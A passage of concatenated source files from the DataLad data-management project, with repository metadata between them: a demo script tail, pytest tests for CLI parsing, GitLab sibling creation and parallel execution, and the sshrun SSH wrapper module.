\"Anyone with permission to access a box.com account that the original box.com folder has been shared with can get access to the stored content\"\nrun \"datalad siblings -d ~/fromgh enable -s box.com\"\nsay \"If DataLad does not yet know about a user's box.com account, the above command would have prompted the user to provide access credentials\"\n\nsay \"Let's confirm that the newly installed dataset is only aware of the GitHub and box.com locations\"\nrun \"cd fromgh\"\nrun \"git remote -v\"\n\nsay \"Now we can obtain the data file, without having to worry about where exactly it is hosted\"\nrun \"datalad get big.dat\"\nrun \"ls -sLh big.dat\"\n\nsay \"Similar configurations are possible for any data storage solutions supported by git-annex. 
See https://git-annex.branchable.com/special_remotes for more info.\"\n" }, { "alpha_fraction": 0.5954577922821045, "alphanum_fraction": 0.5958126187324524, "avg_line_length": 31.017045974731445, "blob_id": "7b79f0961ec0cf67fa497206ed987392e7793dd6", "content_id": "542f3761d0d4000fdeba7699a0fcc4cb57603b01", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5636, "license_type": "permissive", "max_line_length": 117, "num_lines": 176, "path": "/datalad/cli/tests/test_exec.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "import argparse\nfrom argparse import Namespace\n\nimport pytest\n\nfrom datalad.interface.base import Interface\nfrom datalad.support.param import Parameter\nfrom datalad.tests.utils_pytest import (\n assert_not_in,\n eq_,\n patch_config,\n)\nfrom datalad.utils import updated\n\nfrom ..exec import (\n _get_result_filter,\n call_from_parser,\n)\nfrom ..parser import (\n parser_add_common_options,\n setup_parser_for_interface,\n)\n\n\ndef _args(**kwargs):\n return Namespace(\n # ATM duplicates definitions done by cmdline.main and\n # required by code logic to be defined. (should they?)\n #\n # TODO: The common options are now added by\n # cmdline.helpers.parser_add_common_options(), which can be reused by\n # tests.\n **updated(\n dict(\n common_result_renderer=\"generic\"\n ),\n kwargs\n )\n )\n\n\ndef _new_args(**kwargs):\n # A few more must be specified\n return _args(\n **updated(\n dict(\n common_on_failure=None, # ['ignore', 'continue', 'stop']\n common_report_status=None, # ['all', 'success', 'failure', 'ok', 'notneeded', 'impossible', 'error']\n common_report_type=None, # ['dataset', 'file']\n ),\n kwargs\n )\n )\n\n\n\n\ndef test_call_from_parser_old_style():\n # test that old style commands are invoked without any additional arguments\n class DummyOne(Interface):\n @staticmethod\n def __call__(arg=None):\n eq_(arg, \"nothing\")\n return \"magical\"\n val = call_from_parser(DummyOne, _args(arg=\"nothing\"))\n eq_(val, \"magical\")\n\n\ndef test_call_from_parser_old_style_generator():\n # test that old style commands are invoked without any additional arguments\n class DummyOne(Interface):\n @staticmethod\n def __call__(arg=None):\n eq_(arg, \"nothing\")\n yield \"nothing is\"\n yield \"magical\"\n val = call_from_parser(DummyOne, _args(arg=\"nothing\"))\n eq_(val, [\"nothing is\", \"magical\"])\n\n\ndef test_call_from_parser_default_args():\n class DummyOne(Interface):\n # explicitly without @eval_results\n @staticmethod\n def __call__(arg=None, **kwargs):\n eq_(kwargs['common_on_failure'], None)\n eq_(kwargs['common_report_status'], None)\n eq_(kwargs['common_report_type'], None)\n # and even those we didn't pass\n eq_(kwargs['common_result_renderer'], \"generic\")\n # with dissolution of _OLD_STYLE_COMMANDS yoh yet to find\n # a real interface which had return_type (defined in\n # eval_params) but no @eval_results\n # eq_(kwargs['return_type'], \"generator\")\n eq_(arg, \"nothing\")\n yield \"nothing is\"\n yield \"magical\"\n\n # just to be sure no evil spirits chase away our Dummy\n val = call_from_parser(DummyOne, _new_args(arg=\"nothing\"))\n eq_(val, [\"nothing is\", \"magical\"])\n\n\ndef test_call_from_parser_result_filter():\n class DummyOne(Interface):\n @staticmethod\n def __call__(**kwargs):\n yield kwargs\n\n # call_from_parser doesn't add result_filter to the keyword arguments\n assert_not_in(\"result_filter\",\n call_from_parser(DummyOne, 
_new_args())[0])\n # with dissolution of _OLD_STYLE_COMMANDS and just relying on having\n # @eval_results, no result_filter is added, since those commands are\n # not guaranteed to return/yield any record suitable for filtering.\n # The effect is the same -- those \"common\" options are not really applicable\n # to Interface's which do not return/yield expected records\n assert_not_in(\n \"result_filter\",\n call_from_parser(\n DummyOne,\n _new_args(common_report_type=\"dataset\"))[0])\n\n\ndef test_get_result_filter_arg_vs_config():\n # just tests that we would be obtaining the same constraints via\n # cmdline argument or via config variable. With cmdline overloading\n # config\n f = _get_result_filter\n eq_(f(_new_args()), None) # by default, no filter\n\n for v in \"success\", \"failure\", \"ok\", \"notneeded\", \"error\":\n cargs = f(_new_args(common_report_status=v))\n assert cargs is not None\n with patch_config({\"datalad.runtime.report-status\": v}):\n ccfg = f(_new_args())\n ccfg_none = f(_new_args(common_report_status=\"all\"))\n # cannot compare directly but at least could verify based on repr\n print(\"%s -> %s\" % (v, repr(cargs)))\n eq_(repr(cargs), repr(ccfg))\n # and if 'all' - none filter\n eq_(None, ccfg_none)\n\n # and we overload the \"error\" in config\n with patch_config({\"datalad.runtime.report-status\": \"error\"}):\n cargs_overload = f(_new_args(common_report_status=v))\n eq_(repr(cargs), repr(cargs_overload))\n\n\[email protected](\n \"how\",\n [\"bare\", \"dest\", \"args\"]\n)\ndef test_call_from_parser_pos_arg_underscore(how):\n kwds = {\"doc\": \"pos_arg doc\"}\n if how == \"dest\":\n kwds[\"dest\"] = \"pos_arg\"\n elif how == \"args\":\n kwds[\"args\"] = (\"pos_arg\",)\n elif how != \"bare\":\n raise AssertionError(\"Unrecognized how: {}\".format(how))\n\n class Cmd(Interface):\n\n _params_ = dict(\n pos_arg=Parameter(**kwds))\n\n def __call__(pos_arg, **kwargs):\n return pos_arg\n\n parser = argparse.ArgumentParser()\n parser_add_common_options(parser)\n setup_parser_for_interface(parser, Cmd)\n args = parser.parse_args([\"val\"])\n eq_(call_from_parser(Cmd, args),\n \"val\")\n\n" }, { "alpha_fraction": 0.5781345963478088, "alphanum_fraction": 0.5862184166908264, "avg_line_length": 37.491416931152344, "blob_id": "f31afade7060699b9f48ffbb7e1df5e8a627878f", "content_id": "a2c9a5d130dd8c4ac8a3fd2fbb0516359d7cb3d1", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 17937, "license_type": "permissive", "max_line_length": 95, "num_lines": 466, "path": "/datalad/distributed/tests/test_create_sibling_gitlab.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test create publication target on gitlab\"\"\"\n\nimport os\nimport pytest\n# this must import ok with and without gitlab\nfrom datalad.api import (\n Dataset,\n create,\n create_sibling_gitlab,\n)\nfrom datalad.tests.utils_pytest import (\n assert_raises,\n assert_repo_status,\n assert_result_count,\n assert_status,\n eq_,\n with_tempfile,\n)\nfrom datalad.utils import chpwd\n\n\ndef _get_nested_collections(path):\n ds = Dataset(path).create()\n c1 = ds.create(ds.pathobj / 'subdir' / 'collection1')\n c1s1 = 
c1.create('sub1')\n c1s2 = c1.create('sub2')\n c2 = ds.create('collection2')\n c2s1 = c2.create('sub1')\n c2s11 = c2s1.create('deepsub1')\n ds.save(recursive=True)\n assert_repo_status(ds.path)\n # return a catalog\n return dict(\n root=ds,\n c1=c1,\n c1s1=c1s1,\n c1s2=c1s2,\n c2=c2,\n c2s1=c2s1,\n c2s11=c2s11,\n )\n\n\n# doesn't actually need gitlab and exercises most of the decision logic\n@with_tempfile\ndef test_dryrun(path=None):\n ctlg = _get_nested_collections(path)\n # no site config -> error\n assert_raises(ValueError, ctlg['root'].create_sibling_gitlab)\n # wrong path specification -> impossible result\n res = ctlg['root'].create_sibling_gitlab(\n dry_run=True, on_failure='ignore',\n site='dummy', path='imaghost'\n )\n assert_result_count(res, 1)\n assert_result_count(\n res, 1, path=ctlg['root'].pathobj / 'imaghost', type='dataset',\n status='impossible')\n # single project vs multi-dataset call\n assert_raises(\n ValueError,\n ctlg['root'].create_sibling_gitlab,\n site='site', project='one', recursive=True)\n assert_raises(\n ValueError,\n ctlg['root'].create_sibling_gitlab,\n site='site', project='one', path=['one', 'two'])\n # explicit cite, no path constraints, fails for lack of project path config\n res = ctlg['root'].create_sibling_gitlab(\n dry_run=True, on_failure='ignore',\n site='dummy',\n )\n assert_result_count(res, 1)\n assert_result_count(\n res, 1, path=ctlg['root'].path, type='dataset', status='error',\n site='dummy', sibling='dummy',\n )\n # now a working, fully manual call\n for p in (None, ctlg['root'].path):\n res = ctlg['root'].create_sibling_gitlab(\n dry_run=True, on_failure='ignore',\n site='dummy', project='here',\n path=p,\n )\n assert_result_count(res, 1)\n assert_result_count(\n res, 1, path=ctlg['root'].path, type='dataset', status='ok',\n site='dummy', sibling='dummy', project='here/project',\n )\n\n # now configure a default gitlab site\n ctlg['root'].config.set('datalad.gitlab-default-site', 'theone')\n # we don't need to specify one anymore, but we can still customize\n # the sibling name\n res = ctlg['root'].create_sibling_gitlab(\n dry_run=True, on_failure='ignore',\n name='ursula', project='here',\n )\n assert_result_count(res, 1)\n assert_result_count(\n res, 1, path=ctlg['root'].path, type='dataset', status='ok',\n site='theone', sibling='ursula', project='here/project',\n )\n # now configure a sibling name for this site\n ctlg['root'].config.set('datalad.gitlab-theone-siblingname', 'dieter')\n # and another one for another site\n ctlg['root'].config.set('datalad.gitlab-otherone-siblingname', 'ulf')\n # no need to specific 'name' anymore\n res = ctlg['root'].create_sibling_gitlab(\n dry_run=True, on_failure='ignore',\n project='here',\n )\n assert_result_count(\n res, 1, path=ctlg['root'].path, type='dataset', status='ok',\n site='theone', sibling='dieter', project='here/project',\n )\n # properly switches the name based on site\n res = ctlg['root'].create_sibling_gitlab(\n dry_run=True, on_failure='ignore',\n site='otherone', project='here',\n )\n assert_result_count(\n res, 1, path=ctlg['root'].path, type='dataset', status='ok',\n site='otherone', sibling='ulf', project='here/project',\n )\n # reports notneeded on existing='skip' with an existing remote\n ctlg['root'].repo.add_remote('dieter', 'http://example.com')\n res = ctlg['root'].create_sibling_gitlab(\n dry_run=True, on_failure='ignore',\n project='here', existing='skip',\n )\n assert_result_count(\n res, 1, path=ctlg['root'].path, type='dataset', status='notneeded',\n 
site='theone', sibling='dieter',\n )\n ctlg['root'].repo.remove_remote('dieter')\n\n # lastly, configure a project path\n ctlg['root'].config.set('datalad.gitlab-theone-project', 'secret')\n # now we can drive it blind\n res = ctlg['root'].create_sibling_gitlab(dry_run=True)\n assert_result_count(\n res, 1, path=ctlg['root'].path, type='dataset', status='ok',\n site='theone', sibling='dieter', project='secret/project',\n )\n # we can make use of the config in the base dataset to drive\n # calls on subdatasets: use -d plus a path\n res = ctlg['root'].create_sibling_gitlab(path='subdir', dry_run=True)\n # only a single result, doesn't touch the parent\n assert_result_count(res, 1)\n assert_result_count(\n res, 1, path=ctlg['c1'].path, type='dataset', status='ok',\n site='theone', sibling='dieter',\n # collection setup: superdataset becomes group name and \"project\"\n # project underneath, subdirectories and subdatasets are projects\n # with path separators replaced underneath the group.\n project='secret/{}'.format(str(\n ctlg['c1'].pathobj.relative_to(ctlg['root'].pathobj)).replace(\n os.sep, '-')),\n )\n # we get the same result with an explicit layout request\n expl_res = ctlg['root'].create_sibling_gitlab(\n path='subdir', layout='collection', dry_run=True)\n eq_(res, expl_res)\n # layout can be configured too, \"collection\" is \"flat\" in a group\n ctlg['root'].config.set('datalad.gitlab-theone-layout', 'collection')\n res = ctlg['root'].create_sibling_gitlab(\n path='subdir', dry_run=True)\n assert_result_count(\n res, 1, path=ctlg['c1'].path, type='dataset', status='ok',\n # http://site/group/dir-dir-dir-name.git\n project='secret/{}'.format(str(\n ctlg['c1'].pathobj.relative_to(ctlg['root'].pathobj)).replace(\n os.sep, '-')),\n )\n # make sure the reference dataset does not conflict with its group in this\n # case\n res = ctlg['root'].create_sibling_gitlab(dry_run=True)\n assert_result_count(\n res, 1, path=ctlg['root'].path, type='dataset', status='ok',\n project='secret/project')\n # \"flat\" does GitHub-style\n ctlg['root'].config.set('datalad.gitlab-theone-layout', 'flat')\n res = ctlg['root'].create_sibling_gitlab(\n path='subdir', dry_run=True)\n assert_result_count(\n res, 1, path=ctlg['c1'].path, type='dataset', status='ok',\n # http://site/base-dir-dir-dir-name.git\n project='secret-{}'.format(str(\n ctlg['c1'].pathobj.relative_to(ctlg['root'].pathobj)).replace(\n os.sep, '-')),\n )\n\n # the results do not depend on explicitly given datasets, if we just enter\n # the parent dataset we get the same results\n with chpwd(str(ctlg['root'].pathobj / 'subdir')):\n rel_res = create_sibling_gitlab(path=os.curdir, dry_run=True)\n eq_(res, rel_res)\n # and again the same results if we are in a subdataset and point to a parent\n # dataset as a reference and config provider\n with chpwd(ctlg['c1'].path):\n rel_res = create_sibling_gitlab(\n dataset=ctlg['root'].path, path=os.curdir, dry_run=True)\n eq_(res, rel_res)\n\n # blows on unknown layout\n ctlg['root'].config.unset('datalad.gitlab-theone-layout')\n assert_raises(\n ValueError,\n ctlg['root'].create_sibling_gitlab, layout='funny', dry_run=True)\n\n # and finally recursion\n res = ctlg['root'].create_sibling_gitlab(recursive=True, dry_run=True)\n # one result per dataset\n assert_result_count(res, len(ctlg))\n # verbose check of target layout (easier to see target pattern for humans)\n # default layout: collection\n expected_collection_res = [\n 'secret/collection2',\n 'secret/collection2-sub1',\n 
'secret/collection2-sub1-deepsub1',\n 'secret/project',\n 'secret/subdir-collection1',\n 'secret/subdir-collection1-sub1',\n 'secret/subdir-collection1-sub2',\n ]\n eq_(\n sorted(r['project'] for r in res),\n expected_collection_res\n )\n # should be the same when explicitly requested\n res = ctlg['root'].create_sibling_gitlab(\n recursive=True, layout='collection', dry_run=True)\n assert_result_count(res, len(ctlg))\n eq_(\n sorted(r['project'] for r in res),\n expected_collection_res\n )\n res = ctlg['root'].create_sibling_gitlab(\n recursive=True, layout='flat', dry_run=True)\n assert_result_count(res, len(ctlg))\n eq_(\n sorted(r['project'] for r in res),\n [\n 'secret',\n 'secret-collection2',\n 'secret-collection2-sub1',\n 'secret-collection2-sub1-deepsub1',\n 'secret-subdir-collection1',\n 'secret-subdir-collection1-sub1',\n 'secret-subdir-collection1-sub2',\n ],\n )\n # test that the configurations work\n ctlg['root'].config.set(\"datalad.gitlab-default-projectname\", 'myownname')\n ctlg['c1s1'].config.set(\"datalad.gitlab-default-pathseparator\", '+')\n res = ctlg['root'].create_sibling_gitlab(\n recursive=True, layout='flat', dry_run=True)\n assert_result_count(res, len(ctlg))\n eq_(\n sorted(r['project'] for r in res),\n [\n 'secret',\n 'secret+subdir+collection1+sub1',\n 'secret-collection2',\n 'secret-collection2-sub1',\n 'secret-collection2-sub1-deepsub1',\n 'secret-subdir-collection1',\n 'secret-subdir-collection1-sub2',\n ],\n )\n res = ctlg['root'].create_sibling_gitlab(\n recursive=True, layout='collection', dry_run=True)\n assert_result_count(res, len(ctlg))\n eq_(\n sorted(r['project'] for r in res),\n [\n 'secret/collection2',\n 'secret/collection2-sub1',\n 'secret/collection2-sub1-deepsub1',\n 'secret/myownname',\n 'secret/subdir+collection1+sub1',\n 'secret/subdir-collection1',\n 'secret/subdir-collection1-sub2',\n ],\n )\n # test for #7429: when a subdataset is uninstalled, recursion must\n # not crash with KeyError\n ctlg['root'].drop(['subdir/collection1', 'collection2'],\n what='datasets', recursive=True, reckless='kill')\n try:\n res = ctlg['root'].create_sibling_gitlab(\n recursive=True, layout='collection', dry_run=True,\n on_failure='ignore')\n except TypeError:\n pytest.fail(\"Crashed with TypeError on uninstalled datasets\")\n\n\nclass _FakeGitLab(object):\n def __init__(self, site):\n pass\n\n\nclass _NewProjectGitLab(_FakeGitLab):\n def get_project(self, path):\n return None\n\n def create_project(self, path, description=None):\n return dict(\n http_url_to_repo='http://example.com',\n ssh_url_to_repo='example.com',\n description=description,\n )\n\n\nclass _ExistingProjectGitLab(_FakeGitLab):\n def get_project(self, path):\n return dict(\n http_url_to_repo='http://example.com',\n ssh_url_to_repo='example.com',\n )\n\n\nclass _ExistingProjectOtherURLGitLab(_FakeGitLab):\n def get_project(self, path):\n return dict(\n http_url_to_repo='http://example2.com',\n ssh_url_to_repo='example2.com',\n )\n\n\nclass _CreateFailureGitLab(_FakeGitLab):\n def get_project(self, path):\n None\n\n def create_project(self, path, description=None):\n raise RuntimeError\n\n\n@with_tempfile\ndef test_fake_gitlab(path=None):\n from unittest.mock import patch\n ds = Dataset(path).create()\n with patch(\"datalad.distributed.create_sibling_gitlab.GitLabSite\", _NewProjectGitLab):\n res = ds.create_sibling_gitlab(site='dummy', project='here', description='thisisit')\n assert_result_count(res, 2)\n # GitLab success\n assert_result_count(\n res, 1, action='create_sibling_gitlab', 
path=path, type='dataset',\n site='dummy', sibling='dummy', project='here/project', description='thisisit',\n project_attributes={\n 'http_url_to_repo': 'http://example.com',\n 'ssh_url_to_repo': 'example.com',\n 'description': 'thisisit'\n },\n status='ok')\n assert_result_count(\n res, 1, action='configure-sibling', path=path, name='dummy',\n url='http://example.com', status='ok')\n\n # test sibling name conflicts\n with patch(\"datalad.distributed.create_sibling_gitlab.GitLabSite\", _ExistingProjectGitLab):\n res = ds.create_sibling_gitlab(path=ds.path, site='dummy',\n project='here', existing='skip')\n assert_result_count(res, 1)\n assert_result_count(\n res, 0, action='create_sibling_gitlab',\n message=['already has a configured sibling \"%s\"', \"dummy\"],\n path=path,\n refds=path,\n site='dummy', sibling='dummy',\n status='notneeded',\n type='dataset'\n )\n # sibling name conflict with existing='error' should yiel error\n with patch(\"datalad.distributed.create_sibling_gitlab.GitLabSite\", _ExistingProjectGitLab):\n res = ds.create_sibling_gitlab(path=ds.path, site='dummy',\n project='here', existing='skip')\n assert_result_count(res, 1)\n assert_result_count(\n res, 0, action='create_sibling_gitlab',\n message=['already has a configured sibling \"%s\"', \"dummy\"],\n path=path,\n refds=path,\n site='dummy', sibling='dummy',\n status='error',\n type='dataset'\n )\n # try recreation, the sibling is already configured, same setup, no error\n with patch(\"datalad.distributed.create_sibling_gitlab.GitLabSite\",\n _ExistingProjectGitLab):\n res = ds.create_sibling_gitlab(path=ds.path, site='dummy',\n project='here', existing='reconfigure')\n assert_result_count(\n res, 1, action='configure-sibling', path=path, name='dummy',\n url='http://example.com', status='ok')\n # but error when the name differs\n res = ds.create_sibling_gitlab(\n site='dummy', project='here', name='othername', on_failure='ignore')\n assert_result_count(res, 1)\n assert_result_count(\n res, 1, action='create_sibling_gitlab', path=path,\n site='dummy', sibling='othername', project='here/project',\n project_attributes={\n 'http_url_to_repo': 'http://example.com',\n 'ssh_url_to_repo': 'example.com'\n },\n status='error')\n\n with patch(\"datalad.distributed.create_sibling_gitlab.GitLabSite\", _CreateFailureGitLab):\n assert_status(\n 'error',\n ds.create_sibling_gitlab(site='dummy', project='here', on_failure='ignore')\n )\n\n # new sibling, ssh access\n with patch(\"datalad.distributed.create_sibling_gitlab.GitLabSite\", _NewProjectGitLab):\n res = ds.create_sibling_gitlab(site='sshsite', project='here', access='ssh')\n assert_result_count(res, 2)\n assert_result_count(\n res, 1, action='create_sibling_gitlab', path=path, type='dataset',\n site='sshsite', sibling='sshsite', project='here/project',\n project_attributes={\n 'http_url_to_repo': 'http://example.com',\n 'ssh_url_to_repo': 'example.com',\n 'description': None\n },\n status='ok')\n assert_result_count(\n res, 1, action='configure-sibling', path=path, name='sshsite',\n url='example.com', status='ok')\n\n with patch(\"datalad.distributed.create_sibling_gitlab.GitLabSite\",\n _ExistingProjectOtherURLGitLab):\n res = ds.create_sibling_gitlab(site='sshsite', project='here',\n access='ssh', on_failure='ignore',\n name='sshsite2')\n assert_result_count(res, 1)\n assert_result_count(\n res, 0, action='create_sibling_gitlab',\n message=[\"There is already a project at '%s' on site '%s', \"\n \"but no sibling with name '%s' is configured, \"\n \"maybe use 
--existing=reconfigure\", \"here\", \"sshsite\",\n \"sshsite2\"],\n path=path,\n refds=path,\n site='sshsite', sibling='sshsite2', project='here/project',\n project_attributes={\n 'http_url_to_repo': 'http://example2.com',\n 'ssh_url_to_repo': 'example2.com'\n },\n status='error',\n type='dataset')\n # same goes for switching the access type without --reconfigure\n assert_status(\n 'error',\n ds.create_sibling_gitlab(site='sshsite', project='here',\n access='http', on_failure='ignore')\n )\n" }, { "alpha_fraction": 0.5369579792022705, "alphanum_fraction": 0.5466187596321106, "avg_line_length": 33.7734375, "blob_id": "78aaafaf63e146d3c6963a49f219b97a783c9599", "content_id": "c2685d5d7530b711362d4715d32e6fe4b58bbf7b", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4451, "license_type": "permissive", "max_line_length": 87, "num_lines": 128, "path": "/datalad/support/sshrun.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"SSH command to expose datalad's connection management to 3rd-party tools\n\nPrimary use case is to be used with git as core.sshCommand\n\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\n\nimport logging\nimport os\nimport sys\nimport tempfile\n\nfrom datalad.support.param import Parameter\nfrom datalad.interface.base import Interface\nfrom datalad.interface.base import build_doc\nfrom datalad.utils import split_cmdline\n\nfrom datalad import ssh_manager\n\nlgr = logging.getLogger('datalad.sshrun')\n\n\n@build_doc\nclass SSHRun(Interface):\n \"\"\"Run command on remote machines via SSH.\n\n This is a replacement for a small part of the functionality of SSH.\n In addition to SSH alone, this command can make use of datalad's SSH\n connection management. 
Its primary use case is to be used with Git\n as 'core.sshCommand' or via \"GIT_SSH_COMMAND\".\n\n Configure `datalad.ssh.identityfile` to pass a file to the ssh's -i option.\n \"\"\"\n\n _params_ = dict(\n login=Parameter(\n args=(\"login\",),\n doc=\"[user@]hostname\"),\n cmd=Parameter(\n args=(\"cmd\",),\n doc=\"command for remote execution\"),\n port=Parameter(\n args=(\"-p\", '--port'),\n doc=\"port to connect to on the remote host\"),\n ipv4=Parameter(\n args=(\"-4\",),\n dest=\"ipv4\",\n doc=\"use IPv4 addresses only\",\n action=\"store_true\"),\n ipv6=Parameter(\n args=(\"-6\",),\n dest=\"ipv6\",\n doc=\"use IPv6 addresses only\",\n action=\"store_true\"),\n options=Parameter(\n args=(\"-o\",),\n metavar=\"OPTION\",\n dest=\"options\",\n doc=\"configuration option passed to SSH\",\n action=\"append\"),\n no_stdin=Parameter(\n args=(\"-n\",),\n action=\"store_true\",\n dest=\"no_stdin\",\n doc=\"Do not connect stdin to the process\"),\n )\n\n @staticmethod\n def __call__(login, cmd,\n *,\n port=None, ipv4=False, ipv6=False, options=None,\n no_stdin=False):\n lgr.debug(\"sshrun invoked: login=%r, cmd=%r, port=%r, options=%r, \"\n \"ipv4=%r, ipv6=%r, no_stdin=%r\",\n login, cmd, port, options, ipv4, ipv6, no_stdin)\n # Perspective workarounds for git-annex invocation, see\n # https://github.com/datalad/datalad/issues/1456#issuecomment-292641319\n\n if cmd.startswith(\"'\") and cmd.endswith(\"'\"):\n lgr.debug(\n \"Detected additional level of quotations in %r so performing \"\n \"command line splitting\", cmd\n )\n # there is an additional layer of quotes\n # Let's strip them off by splitting the command\n cmd_ = split_cmdline(cmd)\n if len(cmd_) != 1:\n raise RuntimeError(\n \"Obtained more or less than a single argument after \"\n \"command line splitting: %s\" % repr(cmd_))\n cmd = cmd_[0]\n sshurl = 'ssh://{}{}'.format(\n login,\n ':{}'.format(port) if port else '')\n\n if ipv4 and ipv6:\n raise ValueError(\"Cannot force both IPv4 and IPv6\")\n elif ipv4:\n force_ip = 4\n elif ipv6:\n force_ip = 6\n else:\n force_ip = None\n\n ssh = ssh_manager.get_connection(sshurl, force_ip=force_ip)\n # use an empty temp file as stdin if none shall be connected\n stdin_ = tempfile.TemporaryFile() if no_stdin else sys.stdin\n try:\n # We pipe the SSH process' stdout/stderr by means of\n # `log_output=False`. That's necessary to let callers - for example\n # git-clone - communicate with the SSH process. 
Hence, we expect no\n # output being returned from this call:\n out, err = ssh(cmd, stdin=stdin_, log_output=False, options=options)\n assert not out\n assert not err\n finally:\n if no_stdin:\n stdin_.close()\n" }, { "alpha_fraction": 0.6243489980697632, "alphanum_fraction": 0.6387774348258972, "avg_line_length": 35.949527740478516, "blob_id": "2f51759b1a781bd0525e44f96f49707fada54879", "content_id": "485ded485b420261789305e138aeb374d5131232", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11713, "license_type": "permissive", "max_line_length": 103, "num_lines": 317, "path": "/datalad/support/tests/test_parallel.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\nimport logging\nfrom functools import partial\nfrom time import (\n sleep,\n time,\n)\n\nimport pytest\n\n# logging effects threading and causes some 'weak' tests to fail,\n# so we will just skip those (well, if happens again -- disable altogether)\nfrom datalad import lgr\nfrom datalad.support import path as op\nfrom datalad.support.exceptions import IncompleteResultsError\n# absolute import only to be able to run test without `nose` so to see progress bar\nfrom datalad.support.parallel import (\n ProducerConsumer,\n ProducerConsumerProgressLog,\n no_parentds_in_futures,\n)\nfrom datalad.tests.utils_pytest import (\n assert_equal,\n assert_greater,\n assert_greater_equal,\n assert_raises,\n assert_repo_status,\n known_failure_osx,\n on_osx,\n on_windows,\n rmtree,\n skip_if,\n slow,\n with_tempfile,\n)\n\ninfo_log_level = lgr.getEffectiveLevel() >= logging.INFO\n\n\ndef check_ProducerConsumer(PC, jobs):\n def slowprod(n, secs=0.001):\n for i in range(n):\n yield i\n sleep(secs)\n\n def slowcons(i):\n # so takes longer to consume than to produce and progress bar will appear\n # after slowprod is done producing\n sleep(0.002)\n yield from fastcons(i)\n\n def fastcons(i):\n # we should still work correctly if consumer is fast!\n yield {\n \"i\": i, \"status\": \"ok\" if i % 2 else \"error\"\n }\n\n for cons in fastcons, slowcons:\n # sorted since order of completion is not guaranteed\n assert_equal(\n sorted(PC(\n slowprod(10),\n cons,\n jobs=jobs),\n key=lambda r: r['i']),\n [{\"i\": i, \"status\": \"ok\" if i % 2 else \"error\"} for i in range(10)])\n\n\ndef check_producing_consumer(jobs):\n def producer():\n yield from range(3)\n def consumer(i):\n yield i\n if isinstance(i, int):\n pc.add_to_producer_queue(str(i**2))\n\n # we auto-detect generator function producer\n pc = ProducerConsumer(producer, consumer, jobs=jobs)\n assert_equal(list(pc), [0, 1, 2, \"0\", \"1\", \"4\"])\n\n\ndef check_producer_future_key(jobs):\n def producer():\n for i in range(3):\n yield i, {\"k\": i**2} # dict is mutable, will need a key\n\n def consumer(args):\n i, d = args\n yield i\n\n pc = ProducerConsumer(producer(), consumer, producer_future_key=lambda r: r[0], jobs=jobs)\n assert_equal(list(pc), [0, 1, 2])\n\n\ndef test_ProducerConsumer():\n # Largely a smoke test, which only verifies correct results output\n for jobs in \"auto\", None, 1, 10:\n for PC in 
ProducerConsumer, ProducerConsumerProgressLog:\n check_ProducerConsumer(PC, jobs)\n check_producing_consumer(jobs)\n check_producer_future_key(jobs)\n\n\n@slow # 12sec on Yarik's laptop\n@with_tempfile(mkdir=True)\ndef test_creatsubdatasets(topds_path=None, n=2):\n from datalad.api import create\n from datalad.distribution.dataset import Dataset\n ds = Dataset(topds_path).create()\n paths = [op.join(topds_path, \"subds%d\" % i) for i in range(n)]\n paths.extend(op.join(topds_path, \"subds%d\" % i, \"subsub%d\" %k) for i in range(n) for k in range(2))\n # To allow for parallel execution without hitting the problem of\n # a lock in the super dataset, we create all subdatasets, and then\n # save them all within their superdataset\n create_ = partial(create, # cfg_proc=\"yoda\",\n result_xfm=None, return_type='generator')\n # if we flip the paths so to go from the end, create without --force should fail\n # and we should get the exception (the first one encountered!)\n # Note: reraise_immediately is of \"concern\" only for producer. since we typically\n # rely on outside code to do the killing!\n assert_raises(IncompleteResultsError, list, ProducerConsumer(paths[::-1], create_, jobs=5))\n # we are in a dirty state, let's just remove all those for a clean run\n rmtree(topds_path)\n\n # and this one followed by save should be good IFF we provide our dependency checker\n ds = Dataset(topds_path).create()\n list(ProducerConsumer(paths, create_, safe_to_consume=no_parentds_in_futures, jobs=5))\n ds.save(paths)\n assert_repo_status(ds.repo)\n\n\ndef test_gracefull_death():\n\n def assert_provides_and_raises(pc, exception, target=None):\n \"\"\"Helper to get all results before exception is raised\"\"\"\n results = []\n with assert_raises(exception):\n for r in pc:\n results.append(r)\n # results should be sorted since we do not guarantee order\n results = sorted(results)\n if target is not None:\n assert_equal(results, target)\n return results\n\n def interrupted_producer():\n yield 1\n raise ValueError()\n\n def consumer(i):\n sleep(0.001)\n yield i\n\n assert_provides_and_raises(\n ProducerConsumer(interrupted_producer(), consumer, jobs=3), ValueError, [1])\n\n def faulty_consumer(i):\n sleep(0.001)\n if i == 1:\n raise ValueError()\n return i\n\n # so we do not get failed, but other parallel ones finish their job\n results = assert_provides_and_raises(\n ProducerConsumer(range(1000), faulty_consumer, jobs=5), ValueError)\n # and analysis of 